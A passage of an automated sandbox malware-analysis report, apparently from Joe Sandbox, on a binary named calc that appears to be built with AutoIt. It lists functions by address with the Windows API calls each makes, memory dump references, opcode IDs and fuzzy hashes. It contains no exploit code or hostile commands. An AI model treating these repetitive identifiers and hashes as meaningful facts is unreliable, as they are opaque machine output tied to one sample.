    • IsWindowVisible.USER32(?), ref: 00415987
    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004159AA
    • SendMessageW.USER32(?,0000000D,00007FFF,?), ref: 004159C3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$VisibleWindow
    • String ID:
    • API String ID: 1853625526-0
    • Opcode ID: 1ba0c9c80bc69c6db7676ae84933813d89e0f06f85e8bd62b39aed65f6076b15
    • Instruction ID: 883e60535c861902fe793dcb489c7ba158f1a2bf64766aa647ccd8c6ac7b81b8
    • Opcode Fuzzy Hash: 1ba0c9c80bc69c6db7676ae84933813d89e0f06f85e8bd62b39aed65f6076b15
    • Instruction Fuzzy Hash: 26115273A18394F5EB2297509C06FDB3F64AF81365F0400ABF444D6193E7A8C5C58796
    Function 0040CDD9 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
    Download Yara Rule
    APIs
    • MoveToEx.GDI32(?,00000000,?,00000000), ref: 0040CE13
    • PolyBezierTo.GDI32(?,?,00000003), ref: 0040CE21
    • LineTo.GDI32(?,?,?), ref: 0040CE36
    • LineTo.GDI32(?,00000000,?), ref: 0040CE4C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Line$BezierMovePoly
    • String ID:
    • API String ID: 2412604778-0
    • Opcode ID: 3884a1eee071de7890d14302d953e48a0e6caa7ee1c97a3991222ef44e30cf1f
    • Instruction ID: f4a798f19040babd5ae9a90d66299cb9f4b040f5f053a2fa754622e3e99d764a
    • Opcode Fuzzy Hash: 3884a1eee071de7890d14302d953e48a0e6caa7ee1c97a3991222ef44e30cf1f
    • Instruction Fuzzy Hash: 5011A031500208FFDB219F68CC88B9B7BA5FF45750F10462AFC9AA2291C3359D92DAD8
    Function 0041237D Relevance: 6.1, APIs: 4, Instructions: 58filethreadCOMMON
    Download Yara Rule
    APIs
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004123AC
    • OpenProcess.KERNEL32(00000438,00000000,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 004123BB
    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 004123EA
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 00412401
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FileProcess$CreateMappingOpenThreadViewWindow
    • String ID:
    • API String ID: 2085894357-0
    • Opcode ID: 75382669b767f4ad5488222fbf913262a6e70212d0470052150fcffc01197b35
    • Instruction ID: 669107df82a005897c57ec4c642622ccca2b8a359d94b7e5d07929d7754caf8e
    • Opcode Fuzzy Hash: 75382669b767f4ad5488222fbf913262a6e70212d0470052150fcffc01197b35
    • Instruction Fuzzy Hash: 6111A3B6100309FFEB105F61CC44ABB776CEB88395F00462AF692C5091C274DD908B24
    Function 0044E459 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • RtlReAllocateHeap.KERNEL32(00000000,00000050,00000000,0044EA4A,00000000,?,00000000), ref: 0044E480
    • RtlAllocateHeap.KERNEL32(00000008,000041C4,00000000,00000000,0044EA4A,00000000,?,00000000), ref: 0044E4B9
    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0044E4D7
    • HeapFree.KERNEL32(00000000,?), ref: 0044E4EE
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Heap$Allocate$AllocFreeVirtual
    • String ID:
    • API String ID: 94566200-0
    • Opcode ID: a3fd5e3a949f7a78fcf4328b251d6220a18b3bd1147b161bd61c9f06b23a6b68
    • Instruction ID: 794246fb6d91a483d3371ec652401cc3041d5f0488e56fd6261ea09eaf57b0e3
    • Opcode Fuzzy Hash: a3fd5e3a949f7a78fcf4328b251d6220a18b3bd1147b161bd61c9f06b23a6b68
    • Instruction Fuzzy Hash: F2115B31610701AFD7B08FAAEC4592A7BB5FB85769B104E2EF162C65B0D370A849CB08
    Function 00414971 Relevance: 6.1, APIs: 4, Instructions: 51synchronizationthreadwindowCOMMON
    Download Yara Rule
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00414991
    • MessageBoxW.USER32(?,?,?,?), ref: 004149C3
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004149D8
    • CloseHandle.KERNEL32(00000000), ref: 004149DF
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
    • String ID:
    • API String ID: 2880819207-0
    • Opcode ID: 9bcb5aa3c768942edd719b5082d50a1b5a7429418ff23bc50409b4238d47a26f
    • Instruction ID: 37f3567695b4e2a04e44fe97a9f8cb04737ee47792f011c909d28ba87a63e80b
    • Opcode Fuzzy Hash: 9bcb5aa3c768942edd719b5082d50a1b5a7429418ff23bc50409b4238d47a26f
    • Instruction Fuzzy Hash: 91016872904244BFDB019FB89C848DF7FACBB89321F440276F515D3291DB348E8487A8
    Function 0040418F Relevance: 6.0, APIs: 4, Instructions: 44COMMON
    Download Yara Rule
    APIs
    • GetWindowRect.USER32(?,?), ref: 004041A5
    • ScreenToClient.USER32(?,?), ref: 004041C3
    • ScreenToClient.USER32(?,?), ref: 004041E3
    • InvalidateRect.USER32(?,?,?,?,?,?,?), ref: 004041FA
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ClientRectScreen$InvalidateWindow
    • String ID:
    • API String ID: 357397906-0
    • Opcode ID: e6c53d79c336a4540c849928479b5bbe4b45c7717b9f6299b7b93d6f2ff35d60
    • Instruction ID: 7a2881a9e657539b123658c6875673d14ae470e9a9d0cf3515e33dff372f4954
    • Opcode Fuzzy Hash: e6c53d79c336a4540c849928479b5bbe4b45c7717b9f6299b7b93d6f2ff35d60
    • Instruction Fuzzy Hash: 2A111FBAD0020DEFDB51DFA8D9819DEBBF9FB48240F104166E945E3211E731AA54DB50
    Function 00457312 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ___addl
    • String ID:
    • API String ID: 2260456530-0
    • Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
    • Instruction ID: 56a7e8b0768f1760fac7a0eab5900b619266d7ac4d86417b63611c217eca51e8
    • Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
    • Instruction Fuzzy Hash: FCF06D76404602AFDA105A42EC02E67B7E9FF44315F4444BAFD5892132F722E86CDF51
    Function 0040CBA4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
      • Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
      • Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
      • Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD
    • MoveToEx.GDI32(?,?,?,00000000), ref: 0040CBC9
    • LineTo.GDI32(?,?,?), ref: 0040CBD6
    • EndPath.GDI32(?), ref: 0040CBE8
    • StrokePath.GDI32(?), ref: 0040CBF2
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
    • String ID:
    • API String ID: 2783949968-0
    • Opcode ID: 47ea1dba58f7e82b7ac036a59097fcfdc4d59cfee1255a3750341a2d29e0b913
    • Instruction ID: 7addbb669f48b3f8bb91b73a7c195707b1c7606dfb2b93494881525acfad2860
    • Opcode Fuzzy Hash: 47ea1dba58f7e82b7ac036a59097fcfdc4d59cfee1255a3750341a2d29e0b913
    • Instruction Fuzzy Hash: 0EF0E931100209FBDF221F649C49FEE3FB45B46B12F044529FE14B12D2CB798851E7A9
    Function 004030FC Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON
    Download Yara Rule
    APIs
    • SendMessageTimeoutW.USER32(0045C6D0,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00403119
    • GetWindowThreadProcessId.USER32(0045C6D0,00000000), ref: 0040312E
    • GetCurrentThreadId.KERNEL32 ref: 00403135
    • AttachThreadInput.USER32(00000000,?,0040301A,?,00000001), ref: 0040313C
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
    • String ID:
    • API String ID: 2710830443-0
    • Opcode ID: f061325f79de26fa8bd7ada1c3a173e6ada7418d19c7524b275892b6c77a0e0a
    • Instruction ID: e0469f5d39f6c9a8ed97173fcd7a9f0b0481b7a02a8b853d1df90955247d746e
    • Opcode Fuzzy Hash: f061325f79de26fa8bd7ada1c3a173e6ada7418d19c7524b275892b6c77a0e0a
    • Instruction Fuzzy Hash: 59E01231684308FAEB119F60DC0AF9A3F5CAB14B42F508021B705AD0E2D7B9DAA1CB5C
    Function 00437318 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
    Download Yara Rule
    APIs
    • GetDesktopWindow.USER32 ref: 00437318
    • 73A1A570.USER32(00000000), ref: 00437321
    • 73A24620.GDI32(00000000,0000000C), ref: 0043733F
    • 73A1A480.USER32(00000000,00000000,00000000), ref: 00437350
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A24620A480A570DesktopWindow
    • String ID:
    • API String ID: 3224241099-0
    • Opcode ID: f2c62f55ca5cce43f5cde80fb10c3dc9d290bcf8ba66136d2a13070f92bb5022
    • Instruction ID: 018ff4b5a4d017dac7f3bc10740a7da225aaef800bd32f7997036d68c1a0139c
    • Opcode Fuzzy Hash: f2c62f55ca5cce43f5cde80fb10c3dc9d290bcf8ba66136d2a13070f92bb5022
    • Instruction Fuzzy Hash: 2DE04F72208204EFE7116B70AC898BE3768DB45367B104437FE03D2152DB28CC02A669
    Function 0043732B Relevance: 6.0, APIs: 4, Instructions: 24COMMON
    Download Yara Rule
    APIs
    • GetDesktopWindow.USER32 ref: 0043732B
    • 73A1A570.USER32(00000000), ref: 00437334
    • 73A24620.GDI32(00000000,0000000C), ref: 0043733F
    • 73A1A480.USER32(00000000,00000000,00000000), ref: 00437350
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A24620A480A570DesktopWindow
    • String ID:
    • API String ID: 3224241099-0
    • Opcode ID: 63ce04af89f033de3621a8f05392a58b7f04b20ac96f9251d967ffb4348b16f7
    • Instruction ID: 8086ee318dde18167b39449471d37fb6207cf429319f02a46873b093764bc1b0
    • Opcode Fuzzy Hash: 63ce04af89f033de3621a8f05392a58b7f04b20ac96f9251d967ffb4348b16f7
    • Instruction Fuzzy Hash: DFE04F32208204EFEB016B70AC898AE3768DB452677104436FA07D2162DB28DC029629
    Function 004232BA Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 334COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: 7523
    • String ID:
    • API String ID: 1018694936-3916222277
    • Opcode ID: 12b98bcb50b38679c915d9785200fd7ec3dc975d796bc64a378180c85d0a6d7b
    • Instruction ID: 8923d016eeb648e7ed5c436ead0c5760abda132f671b9c9f21dbacdbb23af96c
    • Opcode Fuzzy Hash: 12b98bcb50b38679c915d9785200fd7ec3dc975d796bc64a378180c85d0a6d7b
    • Instruction Fuzzy Hash: 34C1C971A00229ABDB10EF55D8459DEB3B8FF04325F54826BE81997251DB3CEE84CF88
    Function 0040DE09 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214comCOMMON
    Download Yara Rule
    APIs
    • OleSetContainedObject.OLE32(0000000C,00000001), ref: 0040DF8B
      • Part of subcall function 0040E034: OleSetContainedObject.OLE32(75C08500,00000000), ref: 0040E0A3
      • Part of subcall function 0040E034: IsWindow.USER32(0011FEE8), ref: 0040E0FC
      • Part of subcall function 0040E034: 73A25CF0.USER32(0011FEE8,?,0040E369,?,0040D16B,?,004091A1,?,?), ref: 0040E109
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ContainedObject$Window
    • String ID: AutoIt3GUI$Container
    • API String ID: 2752853911-3941886329
    • Opcode ID: 16eac1d8ad50930364fb3377cc867ab909cf8ba2eb3dd5a74bc52f2524893900
    • Instruction ID: bf47823b7056066a5e2e6accf56a3fe746e3b4a49be001c8bdeeda6f12d14935
    • Opcode Fuzzy Hash: 16eac1d8ad50930364fb3377cc867ab909cf8ba2eb3dd5a74bc52f2524893900
    • Instruction Fuzzy Hash: 62818AB0A00602EFCB14DFA5C8C496ABBB4FF48305B20856EE906DB791C779E855CF94
    Function 00454120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Info
    • String ID: 0H$0H
    • API String ID: 1807457897-3632109438
    • Opcode ID: a03b05c39c204be3cfdac47b8496c9b10152d593e6408a9f2bbe70603d1d90d3
    • Instruction ID: 857a1bb90ed6b757db5288b16b7c828b2284c8cc85c9d493c8eebaa07cc69fb3
    • Opcode Fuzzy Hash: a03b05c39c204be3cfdac47b8496c9b10152d593e6408a9f2bbe70603d1d90d3
    • Instruction Fuzzy Hash: E34149709141605EE740EF64D88427E7BE0AB8934AF2844BFF9558F353C23A49CE8B9D
    Function 00412C29 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121windowCOMMON
    Download Yara Rule
    APIs
    • LoadStringW.USER32(00000065,?,0000007F,00000000), ref: 00412C6D
    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00412DBE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: IconLoadNotifyShell_String
    • String ID: Line:
    • API String ID: 3363329723-1585850449
    • Opcode ID: cec513ef83b80a499da35bcbc19a8760b23ac609b9edf934d43c185d6a5c382a
    • Instruction ID: d44aa6c7ff2ceec8a5e2fc5b0b8ec97f83009bbda05c0c700851c1c9c39894c2
    • Opcode Fuzzy Hash: cec513ef83b80a499da35bcbc19a8760b23ac609b9edf934d43c185d6a5c382a
    • Instruction Fuzzy Hash: E241A4B19042089AEB11DF65DC45BDE7BB8BB44318F00016BF509E3291E7B89AD9CB9D
    Function 0045705F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109fileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0044F7F5: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,?,?,0044F8C0,?,00000000,0044EFF8,0045B9B8,0000000C,0044CCA9,00000000,00000000,00000002), ref: 0044F822
      • Part of subcall function 0044F7F5: GetLastError.KERNEL32 ref: 0044F82F
    • SetEndOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,00455E63,00000000,80000000), ref: 0045714F
    • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00455E63,00000000,80000000), ref: 00457174
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ErrorFileLast$Pointer
    • String ID: c^E
    • API String ID: 1697706070-2539547054
    • Opcode ID: 85a61695a885214491261f6e433858d14942c132ecedde653fbfc9b3dd6b5f32
    • Instruction ID: b36608169c62242103fee92faa6a2b2a4f55438ee637c16eb5b786c1d23c8d19
    • Opcode Fuzzy Hash: 85a61695a885214491261f6e433858d14942c132ecedde653fbfc9b3dd6b5f32
    • Instruction Fuzzy Hash: B9314C71900514ABEF212F65DC45B8E3B64EF08355F10417BFD089B292EA798E488B9C
    Function 0040BACF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040BBAB
    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0040BBC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
